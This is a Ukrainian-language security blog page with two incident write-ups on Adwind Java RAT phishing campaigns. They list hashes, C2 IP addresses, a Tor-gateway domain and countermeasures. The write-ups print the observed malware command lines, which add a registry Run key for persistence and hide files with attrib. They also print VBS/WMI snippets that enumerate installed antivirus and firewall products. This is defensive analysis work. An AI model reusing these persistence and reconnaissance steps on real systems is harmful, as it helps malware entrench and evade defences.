Search results for adwind

IOC_Adwind_100518

Доброго вечора, панове.

Вчора була зафіксована розсилка шкідливого коду типу #Adwind (RAT).

Ми вже кілька разів розбирали його різні варіації.

#Adwind застосовується для збору інформації та віддаленого керування інфікованими системами.

Рівень загрози, для організацій котрі використовують JRE та альтернативні поштові клієнти* чи WebMail, – високий.

А для тих, хто уважно читає наші поради – низький.

Трохи аналітики:

 • Сервер розсилки імітує домен Інституту зварювання ім. Патона
 • (!) актуальні версії MS Outlook по замовчуванню блокують доступ до приєднань цього типу
 • #Adwind не створює нових запускних файлів крім копії модулів JRE
 • Активно використовує WSH та WMI
 • Не потребує прав Адміністратора
 • Може бути каналом доставки іншого malware
 • Цього разу Jar без обгортки

Схема атаки:

email > Attach (jar) > javaw.exe > java.exe > cscript.exe> WMIC.exe > data exfiltration

Маркери IOC:

Основна частина:

SHA-256        8dd7c604013ca7bdabba34ab04291a85ffb9846063de0efb17f8bf2d0a7e04e8
File name   uba.qrypted.jar (18ZJ127 INV (2).jar)
File size      769.07 KB

Мережеві IOC:

Трафік інфікованої системи:

java.exe    1284 TCP   127.0.0.1   49794        127.0.0.1   7777 SYN_SENT                                                                         
javaw.exe  840   TCP   10.0.2.15   49754        185.227.83.51   5030 ESTABLISHED      

 

java.exe    1284 TCP   APM11       49796        localhost    7777 SYN_SENT                                                                         
javaw.exe  840   TCP   apm11       49754        51.83.227.185.gerber.non-logging.vpn       5030 ESTABLISHED

Активність по процесам:

Коли жертва відкриває JAR файл, відбувається обробка інструкцій і закріплення бекдору:

"C:\Program Files (x86)\Microsoft Office\Office12\OUTLOOK.EXE" /f "C:\Users\operator\Desktop\RE New Order # 014563.msg"
"C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\tmp\Temporary Internet Files\Content.Outlook\RBXHTDD1\18ZJ127 INV (2).jar"
"C:\Program Files\Java\jre7\bin\java.exe" -jar C:\tmp\_0.96591224716123398063543837287709600.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive1028621641851654372.vbs
cscript.exe  C:\tmp\Retrive1028621641851654372.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive1863584818779134903.vbs
cscript.exe  C:\tmp\Retrive1863584818779134903.vbs
"xcopy" "C:\Program Files\Java\jre7" "C:\Users\operator\AppData\Roaming\Oracle\" /e
"cmd.exe" /C cscript.exe C:\tmp\Retrive7838850603346017630.vbs
cscript.exe  C:\tmp\Retrive7838850603346017630.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive1695544840638860067.vbs
cscript.exe  C:\tmp\Retrive1695544840638860067.vbs
"xcopy" "C:\Program Files\Java\jre7" "C:\Users\operator\AppData\Roaming\Oracle\" /e

Таким чином, файли інтерпретатора Java копіюються із \Program Files у каталог профіля користувача.

Після цього проходить закріплення через HKU\Current Version\Run

(!) Зверніть увагу – до списку автозавантаження додається легітимний процес JRE, шкідливі команди передаються параметром:

"reg" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OQZJaDzMiFp /t REG_EXPAND_SZ /d
"\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\DUsCXQFVGan\hwDgRthtXax.BDcliA\"" /f

Щоб приховати сліди, Adwind змінює атрибути робочого каталогу:

"attrib" +h "C:\Users\operator\DUsCXQFVGan\*.*"
"attrib" +h "C:\Users\operator\DUsCXQFVGan"

Після закріплення розпочинається збір інформації:

"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe" -jar C:\Users\operator\DUsCXQFVGan\hwDgRthtXax.BDcliA
"C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe" -jar C:\tmp\_0.72519027776652135739829391954449646.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive1356326019894555462.vbs
cscript.exe  C:\tmp\Retrive1356326019894555462.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive4827650205509862735.vbs
cscript.exe  C:\tmp\Retrive4827650205509862735.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive5797923481866821519.vbs
cscript.exe  C:\tmp\Retrive5797923481866821519.vbs
"cmd.exe" /C cscript.exe C:\tmp\Retrive5311907378487770237.vbs
cscript.exe  C:\tmp\Retrive5311907378487770237.vbs
"WMIC" /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List

Контрзаходи:

 • Перевірка журналів мережевого обладнання на наявність з’єднань із С2
 • Видалення JRE там, де він не є необхідним по роботі
 • Заборона створення/запису .jar файлів у каталозі користувача
 • Блокування доставки файлів типу JAR на рівні Web та Email шлюзів
 • Заборона створення/зчитування vbs файлів або ж повна деактивація механізму WSH
 • Заборонити процесу javaw зчитувати файли з каталогу користувача
 • Суворий контроль переліку автозавантаження – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
 • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталогах C:\Users\**\ – дозволить упередити копіювання файлів JRE
 • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
 • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
 • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_Adwind_070218

Доброго вечора, панове.

Сьогодні зранку зафіксовано спробу доставки загрози типу Adwind (Java backdoor).

Ми з ним уже “знайомі”: розибрав у червні 16го, у травні 17го, на початку вересня 17го та 12го жовтня.

В групі ризику – працівники бухгалтерії (ДБО) та користувачі самописного софту якому потрібен JRE.

Рівень загрози для систем на яких встановлено Java Runtimeвисокий.

Для організацій, що прислухалися до моїх попередніх рекомендацій – низький.

Цього разу примітивно, без обгортки, просто JAR у приєднанні.

Рейтинг приманки на VT jar – 9/60.

Даний клас зразків використовується для збору інформації, виведення облікових даних та віддаленого керування.

Схема атаки:

email > .JAR > %temp%\*.JAR, *.class & *.vbs > %Userprofile%\EALtjyLyxBW\

Маркери IOC:

File name   SKMBT_C02072018.jar
SHA-256        abd38eea774ca43a7df3d4e173b07fcee809e2bb0d9ae6d8fd7021610938e7ce
File size      534.01 KB

При запуску JAR файлу активується процес закріплення в системі:

"C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\operator\Desktop\decoded.jar"

– зверніть увагу, в пам’ять системи завантажується оригінальний/дійсний файл Java, шкідливі інструкції подаються через параметр

 

"C:\Program Files\Java\jre7\bin\java.exe" -jar C:\tmp\_0.92849276228029881768736636918737462.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive8012862021299542926.vbs
cscript.exe  C:\tmp\Retrive8012862021299542926.vbs

– виконуючи шкідливий код Java видобуває із Jar архіву низку скриптових файлів необхідних для виконання закріплення в системі

 

"xcopy" "C:\Program Files\Java\jre7" "C:\Users\operator\AppData\Roaming\Oracle\" /e

– важливий момент – інструкціями передбачено дублювання запускних файлів JRE з Program Files у каталог %AppData%,

 

"reg" add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v NjLVawaQVWM /t REG_EXPAND_SZ /d "\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\EALtjyLyxBW\mvisTvrDYHI.lovyGx\"" /f
=
NjLVawaQVWM   Java(TM) Platform SE binary  Oracle Corporation        c:\users\operator\appdata\roaming\oracle\bin\javaw.exe  21.06.2013 22:05               

– запис у автозавантаження через HCU

"attrib" +h "C:\Users\operator\EALtjyLyxBW\*.*"
"attrib" +h "C:\Users\operator\EALtjyLyxBW"

– приховує свої файли через атрибути файлової системи

 

"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe" -jar C:\Users\operator\EALtjyLyxBW\mvisTvrDYHI.lovyGx
"C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe" -jar C:\tmp\_0.482691304425191373098301473738213403.class
"cmd.exe" /C cscript.exe C:\tmp\Retrive5796149169918309765.vbs
cscript.exe  C:\tmp\Retrive5796149169918309765.vbs

– передача керування на файл з інструкціями з каталогу користувача

 

"WMIC" /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List

Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")
For Each objItem in colItems
 With objItem
 WScript.Echo "{""AV"":""" & .displayName & """}"
 End With
Next

Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")
Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")
For Each objItem in colItems
 With objItem
 WScript.Echo "{""FIREWALL"":""" & .displayName & """}"
 End With
Next
 

– збір інформації про

 • встановленні драйвери PnP пристроїв
 • антивірусне ПЗ
 • брандмауер

(!) може бути ознакою перевірки віртуального середовища або пошук апаратних ключів чи особливої ознаки (Scada контроллери чи POS пристрої)

Після закріплення в системі Adwind ініціює з’єднання із сервером контролю.

Мережеві IOC:

Мережева активність при інфікуванні – спроба з’єднатися із вузлом в TOR

DNS  102   Standard query response 0xe7ab A vvrhhhnaijyj6s2m[.]onion[.]top A 62.0.58.94

Трафік скомпрометованої системи:

java.exe    2208 TCP   127.0.0.1   49359        127.0.0.1   7777 SYN_SENT                                                                         
java.exe    1592 TCP   127.0.0.1   49362        127.0.0.1   7777 SYN_SENT                                                                         
javaw.exe  1464 TCP   10.0.2.15   49291        185.158.139.39 5017 ESTABLISHED

Що можна було зробити аби уникнути інфікування ?

 1. На системах робота яких не залежить від JRE, цей компонент можна та необхідно видалити – тоді код взагалі не запуститься
 2. Доставку JAR файлу можна було зупинити на рівні поштового шлюзу та proxy серверу (як приклад – Web та Email Gateway)
 3. Запис самого JAR в каталозі користувача можна заборонити відповідним правилом Access Protection
 4. Процес інфікування можна зупинити на початку, якщо застосувати правило заборони створення, запису та зчитування vbs файлів у каталозі %temp% (а краще AppData повністю)
 5. Якщо ж співробітнику потрібна і JRE і JAR файли, правилами AP можна заборонити процесу javaw зчитування та виконання JAR файлів із каталогу користувача – цей підхід теж досить дієвий (що правда тоді краще забороняти запуск і зчитування будь-яких файлів адже через параметр інструкції можуть подаватися з tmp )
 6. У кого наразі немає VSE/ENS із AP можуть деактивувати WSH – це поламає процес інфікування, але файли будуть створені і їх доведеться прибирати в ручному режимі або ж в автоматичному, але за допомогою MAR

Контрзаходи:

 • Перевірка журналів мережевого обладнання по наданим маркерам
 • Блокування JAR файлів на рівні каналів передачі Web та Email
 • Інвентаризація встановленого ПЗ і видалення JRE там, де він не є критично потрібним
 • Заборона створення та зчитування/запуску *.JAR, *.VBS з каталогів профілю користувача %appdata%, а не лише у %temp% !
 • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
 • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
 • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR